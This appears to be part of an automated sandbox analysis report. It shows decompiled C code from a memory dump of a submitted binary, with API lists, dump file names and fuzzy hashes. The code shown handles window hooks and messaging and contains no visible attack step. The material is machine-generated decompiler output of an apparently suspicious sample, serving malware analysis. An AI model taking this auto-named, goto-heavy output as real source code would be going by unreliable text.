                                                                                                                                                                                                                                                                                          									_push(8);
                                                                                                                                                                                                                                                                                          									_v4 = 3;
                                                                                                                                                                                                                                                                                          									_t53 = E001065FC(_t86, _t92, _t96, _t116);
                                                                                                                                                                                                                                                                                          									if(_t53 == 0) {
                                                                                                                                                                                                                                                                                          										_t97 = 0;
                                                                                                                                                                                                                                                                                          										_a12 = 0;
                                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                                          										_t97 = _t53;
                                                                                                                                                                                                                                                                                          										 *_t53 = 0;
                                                                                                                                                                                                                                                                                          										_t53[1] = 0;
                                                                                                                                                                                                                                                                                          										_a12 = _t97;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									_t56 = SetWindowsHookExA(3, E00100AF0,  *0x170c08, _t92);
                                                                                                                                                                                                                                                                                          									if(_t97 != 0) {
                                                                                                                                                                                                                                                                                          										_t119 = _t56;
                                                                                                                                                                                                                                                                                          										if(_t56 != 0) {
                                                                                                                                                                                                                                                                                          											 *_t97 = _t56;
                                                                                                                                                                                                                                                                                          											_t97[1] = 1;
                                                                                                                                                                                                                                                                                          											E00101AF0( &_v20, _t119,  &_v20,  &_a12);
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								goto L19;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							goto L39;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						__eflags = _t51 - 0xffffffff;
                                                                                                                                                                                                                                                                                          						if(__eflags != 0) {
                                                                                                                                                                                                                                                                                          							__eflags = _t51;
                                                                                                                                                                                                                                                                                          							if(_t51 < 0) {
                                                                                                                                                                                                                                                                                          								L21:
                                                                                                                                                                                                                                                                                          								RaiseException(0xc000008c, 1, 0, 0);
                                                                                                                                                                                                                                                                                          								asm("int3");
                                                                                                                                                                                                                                                                                          								asm("int3");
                                                                                                                                                                                                                                                                                          								asm("int3");
                                                                                                                                                                                                                                                                                          								asm("int3");
                                                                                                                                                                                                                                                                                          								asm("int3");
                                                                                                                                                                                                                                                                                          								asm("int3");
                                                                                                                                                                                                                                                                                          								asm("int3");
                                                                                                                                                                                                                                                                                          								asm("int3");
                                                                                                                                                                                                                                                                                          								asm("int3");
                                                                                                                                                                                                                                                                                          								asm("int3");
                                                                                                                                                                                                                                                                                          								asm("int3");
                                                                                                                                                                                                                                                                                          								asm("int3");
                                                                                                                                                                                                                                                                                          								_push(0xffffffff);
                                                                                                                                                                                                                                                                                          								_push(E0010F618);
                                                                                                                                                                                                                                                                                          								_push( *[fs:0x0]);
                                                                                                                                                                                                                                                                                          								_push(_t73);
                                                                                                                                                                                                                                                                                          								_push(_t96);
                                                                                                                                                                                                                                                                                          								_push(_t92);
                                                                                                                                                                                                                                                                                          								_t59 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          								_push(_t59 ^ _t105);
                                                                                                                                                                                                                                                                                          								 *[fs:0x0] =  &_v16;
                                                                                                                                                                                                                                                                                          								_t98 = _a4;
                                                                                                                                                                                                                                                                                          								_t64 = CallWindowProcA( *(_t98 + 0x40),  *(_t98 + 4), _t86, _t79, _a8);
                                                                                                                                                                                                                                                                                          								__eflags =  *(_t98 + 0x84) & 0x00000002;
                                                                                                                                                                                                                                                                                          								_a8 = _t64;
                                                                                                                                                                                                                                                                                          								if(( *(_t98 + 0x84) & 0x00000002) == 0) {
                                                                                                                                                                                                                                                                                          									_v24 = 0x170c68;
                                                                                                                                                                                                                                                                                          									_v8 = 0;
                                                                                                                                                                                                                                                                                          									EnterCriticalSection(0x170c68);
                                                                                                                                                                                                                                                                                          									__eflags =  *0x171994;
                                                                                                                                                                                                                                                                                          									_v20 = 1;
                                                                                                                                                                                                                                                                                          									if( *0x171994 != 0) {
                                                                                                                                                                                                                                                                                          										_t76 = GetCurrentThreadId();
                                                                                                                                                                                                                                                                                          										_a4 = _t76;
                                                                                                                                                                                                                                                                                          										_t94 = E00101B70( &_a4, _t92, _t98);
                                                                                                                                                                                                                                                                                          										__eflags = _t94;
                                                                                                                                                                                                                                                                                          										if(_t94 != 0) {
                                                                                                                                                                                                                                                                                          											_t37 =  &(_t94[1]);
                                                                                                                                                                                                                                                                                          											 *_t37 = _t94[1] - 1;
                                                                                                                                                                                                                                                                                          											__eflags =  *_t37;
                                                                                                                                                                                                                                                                                          											if( *_t37 != 0) {
                                                                                                                                                                                                                                                                                          												L34:
                                                                                                                                                                                                                                                                                          												_t100 =  *0x171994; // 0x0
                                                                                                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                                                                                                          												UnhookWindowsHookEx( *_t94);
                                                                                                                                                                                                                                                                                          												_t100 =  *0x171994; // 0x0
                                                                                                                                                                                                                                                                                          												_t85 =  *(_t100 + 8);
                                                                                                                                                                                                                                                                                          												_t69 = 0;
                                                                                                                                                                                                                                                                                          												__eflags = _t85;
                                                                                                                                                                                                                                                                                          												if(_t85 > 0) {
                                                                                                                                                                                                                                                                                          													_t89 =  *_t100;
                                                                                                                                                                                                                                                                                          													while(1) {
                                                                                                                                                                                                                                                                                          														__eflags =  *_t89 - _t76;
                                                                                                                                                                                                                                                                                          														if( *_t89 == _t76) {
                                                                                                                                                                                                                                                                                          															break;
                                                                                                                                                                                                                                                                                          														}
                                                                                                                                                                                                                                                                                          														_t69 = _t69 + 1;
                                                                                                                                                                                                                                                                                          														_t89 = _t89 + 4;
                                                                                                                                                                                                                                                                                          														__eflags = _t69 - _t85;
                                                                                                                                                                                                                                                                                          														if(_t69 < _t85) {
                                                                                                                                                                                                                                                                                          															continue;
                                                                                                                                                                                                                                                                                          														} else {
                                                                                                                                                                                                                                                                                          														}
                                                                                                                                                                                                                                                                                          														goto L35;
                                                                                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                                                                                          													__eflags = _t69 - 0xffffffff;
                                                                                                                                                                                                                                                                                          													if(_t69 != 0xffffffff) {
                                                                                                                                                                                                                                                                                          														_t70 = E00102BE0(_t69, _t100);
                                                                                                                                                                                                                                                                                          														__eflags = _t70;
                                                                                                                                                                                                                                                                                          														if(_t70 != 0) {
                                                                                                                                                                                                                                                                                          															_push(_t94);
                                                                                                                                                                                                                                                                                          															E001059DB();
                                                                                                                                                                                                                                                                                          														}
                                                                                                                                                                                                                                                                                          														goto L34;
                                                                                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                                          											L35:
                                                                                                                                                                                                                                                                                          											__eflags =  *(_t100 + 8);
                                                                                                                                                                                                                                                                                          											if( *(_t100 + 8) == 0) {
                                                                                                                                                                                                                                                                                          												E000FFF20(_t100);
                                                                                                                                                                                                                                                                                          												 *0x171994 = 0;
                                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									LeaveCriticalSection(0x170c68);
                                                                                                                                                                                                                                                                                          									_t64 = _a8;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								 *[fs:0x0] = _v16;
                                                                                                                                                                                                                                                                                          								return _t64;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								__eflags = _t51 - _t79;
                                                                                                                                                                                                                                                                                          								if(__eflags >= 0) {
                                                                                                                                                                                                                                                                                          									goto L21;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									_t86 = _t96[1];
                                                                                                                                                                                                                                                                                          									_t52 =  *((intOrPtr*)(_t96[1] + _t51 * 4));
                                                                                                                                                                                                                                                                                          									goto L12;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							goto L8;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				L39:
                                                                                                                                                                                                                                                                                          			}































                                                                                                                                                                                                                                                                                          0x000fdd83
                                                                                                                                                                                                                                                                                          0x000fdd88
                                                                                                                                                                                                                                                                                          0x000fdd8e
                                                                                                                                                                                                                                                                                          0x000fde5c
                                                                                                                                                                                                                                                                                          0x000fde61
                                                                                                                                                                                                                                                                                          0x000fde81
                                                                                                                                                                                                                                                                                          0x000fde8d
                                                                                                                                                                                                                                                                                          0x000fde9b
                                                                                                                                                                                                                                                                                          0x000fdd94
                                                                                                                                                                                                                                                                                          0x000fdd94
                                                                                                                                                                                                                                                                                          0x000fdd9a
                                                                                                                                                                                                                                                                                          0x000fdda0
                                                                                                                                                                                                                                                                                          0x000fdda3
                                                                                                                                                                                                                                                                                          0x000fdda5
                                                                                                                                                                                                                                                                                          0x000fdda7
                                                                                                                                                                                                                                                                                          0x000fddac
                                                                                                                                                                                                                                                                                          0x000fddc5
                                                                                                                                                                                                                                                                                          0x000fddc5
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fddae
                                                                                                                                                                                                                                                                                          0x000fddae
                                                                                                                                                                                                                                                                                          0x000fddb0
                                                                                                                                                                                                                                                                                          0x000fddb4
                                                                                                                                                                                                                                                                                          0x000fddb5
                                                                                                                                                                                                                                                                                          0x000fddba
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fddbc
                                                                                                                                                                                                                                                                                          0x000fddbc
                                                                                                                                                                                                                                                                                          0x000fdde1
                                                                                                                                                                                                                                                                                          0x000fdde1
                                                                                                                                                                                                                                                                                          0x000fdde4
                                                                                                                                                                                                                                                                                          0x000fdde6
                                                                                                                                                                                                                                                                                          0x000fde9e
                                                                                                                                                                                                                                                                                          0x000fddec
                                                                                                                                                                                                                                                                                          0x000fddec
                                                                                                                                                                                                                                                                                          0x000fddee
                                                                                                                                                                                                                                                                                          0x000fddf2
                                                                                                                                                                                                                                                                                          0x000fddfc
                                                                                                                                                                                                                                                                                          0x000fde14
                                                                                                                                                                                                                                                                                          0x000fde16
                                                                                                                                                                                                                                                                                          0x000fddfe
                                                                                                                                                                                                                                                                                          0x000fddfe
                                                                                                                                                                                                                                                                                          0x000fde00
                                                                                                                                                                                                                                                                                          0x000fde06
                                                                                                                                                                                                                                                                                          0x000fde0d
                                                                                                                                                                                                                                                                                          0x000fde0d
                                                                                                                                                                                                                                                                                          0x000fde38
                                                                                                                                                                                                                                                                                          0x000fde40
                                                                                                                                                                                                                                                                                          0x000fde42
                                                                                                                                                                                                                                                                                          0x000fde44
                                                                                                                                                                                                                                                                                          0x000fde4d
                                                                                                                                                                                                                                                                                          0x000fde50
                                                                                                                                                                                                                                                                                          0x000fde57
                                                                                                                                                                                                                                                                                          0x000fde57
                                                                                                                                                                                                                                                                                          0x000fde44
                                                                                                                                                                                                                                                                                          0x000fde40
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fdde6
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fddba
                                                                                                                                                                                                                                                                                          0x000fddc0
                                                                                                                                                                                                                                                                                          0x000fddc3
                                                                                                                                                                                                                                                                                          0x000fddc9
                                                                                                                                                                                                                                                                                          0x000fddcb
                                                                                                                                                                                                                                                                                          0x000fdea3
                                                                                                                                                                                                                                                                                          0x000fdeae
                                                                                                                                                                                                                                                                                          0x000fdeb4
                                                                                                                                                                                                                                                                                          0x000fdeb5
                                                                                                                                                                                                                                                                                          0x000fdeb6
                                                                                                                                                                                                                                                                                          0x000fdeb7
                                                                                                                                                                                                                                                                                          0x000fdeb8
                                                                                                                                                                                                                                                                                          0x000fdeb9
                                                                                                                                                                                                                                                                                          0x000fdeba
                                                                                                                                                                                                                                                                                          0x000fdebb
                                                                                                                                                                                                                                                                                          0x000fdebc
                                                                                                                                                                                                                                                                                          0x000fdebd
                                                                                                                                                                                                                                                                                          0x000fdebe
                                                                                                                                                                                                                                                                                          0x000fdebf
                                                                                                                                                                                                                                                                                          0x000fdec3
                                                                                                                                                                                                                                                                                          0x000fdec5
                                                                                                                                                                                                                                                                                          0x000fded0
                                                                                                                                                                                                                                                                                          0x000fded4
                                                                                                                                                                                                                                                                                          0x000fded5
                                                                                                                                                                                                                                                                                          0x000fded6
                                                                                                                                                                                                                                                                                          0x000fded7
                                                                                                                                                                                                                                                                                          0x000fdede
                                                                                                                                                                                                                                                                                          0x000fdee2
                                                                                                                                                                                                                                                                                          0x000fdee8
                                                                                                                                                                                                                                                                                          0x000fdef9
                                                                                                                                                                                                                                                                                          0x000fdeff
                                                                                                                                                                                                                                                                                          0x000fdf06
                                                                                                                                                                                                                                                                                          0x000fdf09
                                                                                                                                                                                                                                                                                          0x000fdf0f
                                                                                                                                                                                                                                                                                          0x000fdf1b
                                                                                                                                                                                                                                                                                          0x000fdf22
                                                                                                                                                                                                                                                                                          0x000fdf28
                                                                                                                                                                                                                                                                                          0x000fdf2f
                                                                                                                                                                                                                                                                                          0x000fdf33
                                                                                                                                                                                                                                                                                          0x000fdf3b
                                                                                                                                                                                                                                                                                          0x000fdf40
                                                                                                                                                                                                                                                                                          0x000fdf48
                                                                                                                                                                                                                                                                                          0x000fdf4a
                                                                                                                                                                                                                                                                                          0x000fdf4c
                                                                                                                                                                                                                                                                                          0x000fdf4e
                                                                                                                                                                                                                                                                                          0x000fdf4e
                                                                                                                                                                                                                                                                                          0x000fdf4e
                                                                                                                                                                                                                                                                                          0x000fdf51
                                                                                                                                                                                                                                                                                          0x000fdf95
                                                                                                                                                                                                                                                                                          0x000fdf95
                                                                                                                                                                                                                                                                                          0x000fdf53
                                                                                                                                                                                                                                                                                          0x000fdf56
                                                                                                                                                                                                                                                                                          0x000fdf5c
                                                                                                                                                                                                                                                                                          0x000fdf62
                                                                                                                                                                                                                                                                                          0x000fdf65
                                                                                                                                                                                                                                                                                          0x000fdf67
                                                                                                                                                                                                                                                                                          0x000fdf69
                                                                                                                                                                                                                                                                                          0x000fdf6b
                                                                                                                                                                                                                                                                                          0x000fdf70
                                                                                                                                                                                                                                                                                          0x000fdf70
                                                                                                                                                                                                                                                                                          0x000fdf72
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fdf74
                                                                                                                                                                                                                                                                                          0x000fdf75
                                                                                                                                                                                                                                                                                          0x000fdf78
                                                                                                                                                                                                                                                                                          0x000fdf7a
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fdf7c
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fdf7a
                                                                                                                                                                                                                                                                                          0x000fdf7e
                                                                                                                                                                                                                                                                                          0x000fdf81
                                                                                                                                                                                                                                                                                          0x000fdf83
                                                                                                                                                                                                                                                                                          0x000fdf88
                                                                                                                                                                                                                                                                                          0x000fdf8a
                                                                                                                                                                                                                                                                                          0x000fdf8c
                                                                                                                                                                                                                                                                                          0x000fdf8d
                                                                                                                                                                                                                                                                                          0x000fdf92
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fdf8a
                                                                                                                                                                                                                                                                                          0x000fdf81
                                                                                                                                                                                                                                                                                          0x000fdf69
                                                                                                                                                                                                                                                                                          0x000fdf9b
                                                                                                                                                                                                                                                                                          0x000fdf9b
                                                                                                                                                                                                                                                                                          0x000fdf9f
                                                                                                                                                                                                                                                                                          0x000fdfa1
                                                                                                                                                                                                                                                                                          0x000fdfa6
                                                                                                                                                                                                                                                                                          0x000fdfa6
                                                                                                                                                                                                                                                                                          0x000fdf9f
                                                                                                                                                                                                                                                                                          0x000fdf4c
                                                                                                                                                                                                                                                                                          0x000fdfb5
                                                                                                                                                                                                                                                                                          0x000fdfbb
                                                                                                                                                                                                                                                                                          0x000fdfbb
                                                                                                                                                                                                                                                                                          0x000fdfc1
                                                                                                                                                                                                                                                                                          0x000fdfcf
                                                                                                                                                                                                                                                                                          0x000fddd1
                                                                                                                                                                                                                                                                                          0x000fddd1
                                                                                                                                                                                                                                                                                          0x000fddd3
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fddd9
                                                                                                                                                                                                                                                                                          0x000fddd9
                                                                                                                                                                                                                                                                                          0x000fdddf
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fdddf
                                                                                                                                                                                                                                                                                          0x000fddd3
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fddc3
                                                                                                                                                                                                                                                                                          0x000fddac
                                                                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 000FDD94
                                                                                                                                                                                                                                                                                          • SetWindowsHookExA.USER32 ref: 000FDE38
                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00170C68), ref: 000FDE61
                                                                                                                                                                                                                                                                                          • GetWindowLongA.USER32 ref: 000FDE6D
                                                                                                                                                                                                                                                                                          • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 000FDEAE
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CriticalCurrentExceptionHookLeaveLongRaiseSectionThreadWindowWindows
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1608875685-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 9559e6a6c35eb0418dec5c1d2abb6be4aa1fd2a5d39e096994bb62a8e0bc4be2
                                                                                                                                                                                                                                                                                          • Instruction ID: 41433a9bcd27eb66068d21480e191981c0755660e37e03d483373ce2a8fdd09f
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9559e6a6c35eb0418dec5c1d2abb6be4aa1fd2a5d39e096994bb62a8e0bc4be2
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B621CF72A003099FE712DF58DD41BBA7BF1EB98750F04C16AE949CB681DB709880DB60
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 78%
                                                                                                                                                                                                                                                                                          			E000F8FE7(intOrPtr __esi) {
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				signed int _t33;
                                                                                                                                                                                                                                                                                          				long* _t35;
                                                                                                                                                                                                                                                                                          				long _t37;
                                                                                                                                                                                                                                                                                          				signed int _t44;
                                                                                                                                                                                                                                                                                          				intOrPtr _t47;
                                                                                                                                                                                                                                                                                          				intOrPtr _t49;
                                                                                                                                                                                                                                                                                          				intOrPtr _t59;
                                                                                                                                                                                                                                                                                          				void* _t65;
                                                                                                                                                                                                                                                                                          				struct HDC__* _t66;
                                                                                                                                                                                                                                                                                          				intOrPtr _t67;
                                                                                                                                                                                                                                                                                          				intOrPtr _t68;
                                                                                                                                                                                                                                                                                          				intOrPtr _t70;
                                                                                                                                                                                                                                                                                          				signed int _t71;
                                                                                                                                                                                                                                                                                          				void* _t73;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t68 = __esi;
                                                                                                                                                                                                                                                                                          				do {
                                                                                                                                                                                                                                                                                          					_t33 =  *(_t68 + 0x534);
                                                                                                                                                                                                                                                                                          					if( *(_t68 + 0x530) != _t33) {
                                                                                                                                                                                                                                                                                          						L10:
                                                                                                                                                                                                                                                                                          						_t35 =  *((intOrPtr*)(_t68 + 0x52c)) +  *(_t68 + 0x530) * 4;
                                                                                                                                                                                                                                                                                          						if(_t35 != 0) {
                                                                                                                                                                                                                                                                                          							 *_t35 =  *(_t71 - 0x1c);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						 *(_t68 + 0x530) =  *(_t68 + 0x530) + 1;
                                                                                                                                                                                                                                                                                          						goto L13;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_t59 =  *((intOrPtr*)(_t68 + 0x52c));
                                                                                                                                                                                                                                                                                          						_t65 = _t71 - 0x1c;
                                                                                                                                                                                                                                                                                          						if(_t65 < _t59 || _t65 >= _t59 + _t33 * 4) {
                                                                                                                                                                                                                                                                                          							if(_t33 != 0) {
                                                                                                                                                                                                                                                                                          								_t44 =  *(_t68 + 0x530) +  *(_t68 + 0x530);
                                                                                                                                                                                                                                                                                          								 *(_t71 - 0x48) = _t44;
                                                                                                                                                                                                                                                                                          								if(_t44 >= 0 && _t44 <= 0x1fffffff) {
                                                                                                                                                                                                                                                                                          									goto L8;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								 *(_t71 - 0x48) = 1;
                                                                                                                                                                                                                                                                                          								L8:
                                                                                                                                                                                                                                                                                          								_t47 = E00106254( *((intOrPtr*)(_t68 + 0x52c)),  *(_t71 - 0x48), 4);
                                                                                                                                                                                                                                                                                          								_t73 = _t73 + 0xc;
                                                                                                                                                                                                                                                                                          								if(_t47 != 0) {
                                                                                                                                                                                                                                                                                          									 *(_t68 + 0x534) =  *(_t71 - 0x48);
                                                                                                                                                                                                                                                                                          									 *((intOrPtr*)(_t68 + 0x52c)) = _t47;
                                                                                                                                                                                                                                                                                          									goto L10;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							L13:
                                                                                                                                                                                                                                                                                          							_t37 = SendMessageA( *(_t68 + 0x254), 0x439, 0, _t71 - 0x44);
                                                                                                                                                                                                                                                                                          							if(_t37 -  *(_t71 - 0x1c) == 0xffffffff) {
                                                                                                                                                                                                                                                                                          								goto L17;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								goto L14;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							_push(0x80004005);
                                                                                                                                                                                                                                                                                          							E000F1170(_t65);
                                                                                                                                                                                                                                                                                          							L17:
                                                                                                                                                                                                                                                                                          							E000FCF50( *(_t68 + 0x530) - 1, _t68 + 0x52c);
                                                                                                                                                                                                                                                                                          							_t68 =  *((intOrPtr*)(_t71 - 0x5c));
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					L18:
                                                                                                                                                                                                                                                                                          					_t64 =  *(_t68 + 0x254);
                                                                                                                                                                                                                                                                                          					SendMessageA( *(_t68 + 0x254), 0x439, 0, 0);
                                                                                                                                                                                                                                                                                          					DeleteDC(_t66);
                                                                                                                                                                                                                                                                                          					 *[fs:0x0] =  *((intOrPtr*)(_t71 - 0xc));
                                                                                                                                                                                                                                                                                          					_pop(_t67);
                                                                                                                                                                                                                                                                                          					_pop(_t70);
                                                                                                                                                                                                                                                                                          					_pop(_t49);
                                                                                                                                                                                                                                                                                          					return E001059E6(1, _t49,  *(_t71 - 0x14) ^ _t71, _t64, _t67, _t70);
                                                                                                                                                                                                                                                                                          					L14:
                                                                                                                                                                                                                                                                                          					 *(_t71 - 0x1c) = _t37;
                                                                                                                                                                                                                                                                                          				} while (_t37 <  *((intOrPtr*)(_t71 - 0x70)));
                                                                                                                                                                                                                                                                                          				goto L18;
                                                                                                                                                                                                                                                                                          			}


















                                                                                                                                                                                                                                                                                          0x000f8fe7
                                                                                                                                                                                                                                                                                          0x000f8ff0
                                                                                                                                                                                                                                                                                          0x000f8ff0
                                                                                                                                                                                                                                                                                          0x000f8ffc
                                                                                                                                                                                                                                                                                          0x000f905f
                                                                                                                                                                                                                                                                                          0x000f906b
                                                                                                                                                                                                                                                                                          0x000f9070
                                                                                                                                                                                                                                                                                          0x000f9075
                                                                                                                                                                                                                                                                                          0x000f9075
                                                                                                                                                                                                                                                                                          0x000f9077
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f8ffe
                                                                                                                                                                                                                                                                                          0x000f8ffe
                                                                                                                                                                                                                                                                                          0x000f9004
                                                                                                                                                                                                                                                                                          0x000f9009
                                                                                                                                                                                                                                                                                          0x000f9018
                                                                                                                                                                                                                                                                                          0x000f9029
                                                                                                                                                                                                                                                                                          0x000f902b
                                                                                                                                                                                                                                                                                          0x000f902e
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f901a
                                                                                                                                                                                                                                                                                          0x000f901a
                                                                                                                                                                                                                                                                                          0x000f9037
                                                                                                                                                                                                                                                                                          0x000f9044
                                                                                                                                                                                                                                                                                          0x000f9049
                                                                                                                                                                                                                                                                                          0x000f904e
                                                                                                                                                                                                                                                                                          0x000f9053
                                                                                                                                                                                                                                                                                          0x000f9059
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f9059
                                                                                                                                                                                                                                                                                          0x000f904e
                                                                                                                                                                                                                                                                                          0x000f907d
                                                                                                                                                                                                                                                                                          0x000f908f
                                                                                                                                                                                                                                                                                          0x000f909d
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f90ad
                                                                                                                                                                                                                                                                                          0x000f90ad
                                                                                                                                                                                                                                                                                          0x000f90b2
                                                                                                                                                                                                                                                                                          0x000f90b7
                                                                                                                                                                                                                                                                                          0x000f90c4
                                                                                                                                                                                                                                                                                          0x000f90c9
                                                                                                                                                                                                                                                                                          0x000f90c9
                                                                                                                                                                                                                                                                                          0x000f9009
                                                                                                                                                                                                                                                                                          0x000f90cc
                                                                                                                                                                                                                                                                                          0x000f90cc
                                                                                                                                                                                                                                                                                          0x000f90dc
                                                                                                                                                                                                                                                                                          0x000f90e3
                                                                                                                                                                                                                                                                                          0x000f90ee
                                                                                                                                                                                                                                                                                          0x000f90f6
                                                                                                                                                                                                                                                                                          0x000f90f7
                                                                                                                                                                                                                                                                                          0x000f90f8
                                                                                                                                                                                                                                                                                          0x000f9106
                                                                                                                                                                                                                                                                                          0x000f909f
                                                                                                                                                                                                                                                                                          0x000f909f
                                                                                                                                                                                                                                                                                          0x000f90a2
                                                                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • __recalloc.LIBCMT ref: 000F9044
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000439,00000000,?), ref: 000F908F
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000439,00000000,00000000), ref: 000F90DC
                                                                                                                                                                                                                                                                                          • DeleteDC.GDI32(00000000), ref: 000F90E3
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
